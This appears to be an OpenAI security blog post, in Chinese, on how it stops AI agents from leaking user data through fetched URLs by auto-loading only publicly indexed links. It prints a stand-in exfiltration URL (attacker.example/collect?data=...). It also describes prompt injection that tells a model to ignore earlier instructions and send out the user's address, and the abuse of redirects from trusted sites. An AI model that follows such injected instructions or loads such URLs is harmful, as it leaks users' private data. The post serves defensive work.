跳至主要內容
OpenAI

2026年1月28日

安全安全防護

如何在 AI 智慧體點擊連結時保護使用者資料

載入中…

AI 系統越來越擅長為使用者執行操作,例如開啟網頁、跟隨連結,或載入圖片來協助回答問題。這些功能固然實用,但也帶來一些不易察覺的風險,因此我們持續投入大量心力降低相關風險。

本文說明我們如何防禦「利用 URL 造成資料外洩」這種特定攻擊,以及當 ChatGPT(和各類智慧體功能)擷取網頁內容時,我們建立了哪些防護機制來降低風險。

問題:URL 不只是用來指向某個網站,也可能包含其他資訊

當你在瀏覽器中點擊連結時,不只是前往某個網站,也會把你要求開啟的 URL 一併傳送給該網站。網站通常會在分析工具與伺服器日誌中記錄這些 URL。

一般情況下,這並沒有問題。但攻擊者可能會誘導模型要求開啟某個 URL,而該 URL 暗中包含敏感資訊,例如電子郵件地址、文件標題,或 AI 在協助使用者時能存取的其他資料。

例如,想像某個網頁(或提示詞)試圖操控模型去擷取像這樣的 URL:

https://attacker.example/collect?data=<something private>

如果模型遭誘導載入這個 URL,攻擊者就能在自己的日誌中看到其中的資料。使用者甚至可能毫無察覺,因為這類要求可能在背景自動發生,例如載入網頁中的內嵌圖片或產生連結預覽時,系統就會向該網址發出要求。

這點尤其重要,因為攻擊者可能利用提示注入技術,在網頁內容中埋入指令,試圖誘導模型違反原本應該遵循的規則,例如要求模型忽略先前指示,並把使用者的地址傳送出去。即使模型在對話中沒有直接「說」出任何敏感資訊,只要遭到誘導去載入特定 URL,仍可能導致資料外洩。

為什麼只靠「可信網站清單」仍然不夠

一個直覺的做法是:「只允許智慧體開啟知名網站的連結。」

這樣確實能降低部分風險,但仍不足以完全解決問題。

其中一個原因是,許多合法網站支援重新導向。連結可能先指向某個「受信任」的網域,接著立刻被重新導向到其他網站。如果安全檢查只查看第一個網域,攻擊者就可能利用受信任網站作為跳板,最後把流量導向自己控制的網站。

同樣重要的是,不夠靈活的允許清單也會影響使用體驗。網際網路非常龐大,人們不會只瀏覽少數幾個熱門網站。如果規則太嚴格,就可能頻繁出現警告或「誤報」。長期下來,使用者反而可能養成看到提示就直接點過、不再仔細查看的習慣。

因此,我們希望建立一種更強、也更容易判斷的安全原則。與其只辨別「這個網域看起來是否可靠」,不如確認「這個確切的 URL是否可以安全地自動載入」。

我們的方法:只有在 URL 已經公開存在於網路上的情況下,才允許智慧體自動擷取

為了降低 URL 夾帶使用者專屬機密資訊的風險,我們採用一個簡單的原則:

如果某個 URL 已經在公開網路上存在,而且不是從任何使用者的對話中產生,那麼其中包含該使用者私人資料的可能性就會低得多。

為了落實這個原則,我們使用一個獨立的網路索引(爬蟲),專門尋找並記錄公開的 URL,而且不會接觸任何使用者對話、帳戶或個人資料。換句話說,這個系統是透過掃描公開網頁來了解網路上的內容,就像搜尋引擎一樣,而不是透過任何與你相關的資訊。

因此,當智慧體準備自動擷取某個 URL 時,我們會先檢查該 URL 是否曾由這個獨立索引記錄過。

  • 如有紀錄:智慧體就可以自動載入該 URL(例如開啟文章或顯示公開圖片)。
  • 如果未有任何紀錄:我們會將該 URL 視為尚未驗證,不會立即信任。系統可能會要求智慧體改用其他網站,或在開啟前顯示警告,要求使用者明確確認是否繼續。

這代表安全判斷的重點不再是「這個網站是否值得信任」,而是改為確認「這個特定網址 是否曾在公開網路上出現,而且不是來自任何使用者資料」。

使用者可能會看到什麼內容

如果無法確認某個連結為公開且先前有過紀錄,我們會把決定權交給使用者。在這種情況下,系統可能會顯示類似以下的提示訊息:

  • 此連結尚未驗證。
  • 其中可能包含來自你對話中的資訊。
  • 繼續之前,請先確認你是否信任這個連結。
標題為「檢查此連結是否安全」的警告對話框,說明該連結尚未經過驗證,可能會將對話資料傳送至第三方網站,並顯示範例網址,以及複製或開啟連結的選項。

這項設計正是為了防範「悄悄外洩」的情境,也就是模型可能在你沒有察覺的情況下載入某個 URL。如果某個連結看起來不太對勁,最安全的做法是不要開啟該連結,並請模型提供其他來源或摘要。

這項防範機制的能力與侷限

這些防護措施的目標是確保一個特定目標:

防止智慧體在擷取網路資源時,透過 URL 本身悄悄外洩與使用者相關的資料。

但這並不代表系統會自動保證以下情況:

  • 網頁內容本身一定值得信任,
  • 網站不會試圖透過社交工程手法誘導你,
  • 頁面不會包含誤導或有害的指示,
  • 或整個瀏覽過程在所有情況下都全然安全。

因此,我們將這項機制視為整體縱深防禦策略中的一層,並搭配其他措施,例如在模型層面降低提示注入風險、產品層級的控制機制、監察,以及持續進行紅隊測試。我們也會持續監測新的規避手法,並逐步強化相關防護。隨著智慧體能力提升,攻擊者勢必也會不斷調整策略,因此這是一項需要長期投入的安全工程,不是一蹴可幾的單次修補。

展望未來

正如網際網路的發展經驗所顯示,若想確保安全,不只要封鎖那些明顯有問題的網站,更重要的是妥善處理灰色地帶,並提供透明的控制機制與可靠的預設保護。

我們的目標,是讓 AI 智慧體在提供實用協助的同時,不會多出新的管道讓你的資訊悄悄外洩。防範利用 URL 造成資料外洩,就是朝這個方向邁出的具體一步。我們也會隨著模型能力與攻擊手法的演變,持續強化這些防護措施。

如果你正在研究提示注入、智慧體安全或資料外洩相關技術,我們歡迎透過負責任揭露的方式與我們合作,一起持續提升整體安全標準。若想進一步了解我們方法的完整技術細節,也可以參閱我們的相關論文(在新視窗中開啟)

作者

Adrian Spânu、Thomas Shadwell

繼續閱讀

檢視全部
oai 1x1
發揮全球領導力,推進青少年安全與發展機會

國際事務

Technical foundations > Art Card
可信第三方評估的共享實務指南

安全

Frontier Governance Framework > card image
OpenAI《前沿治理框架》

安全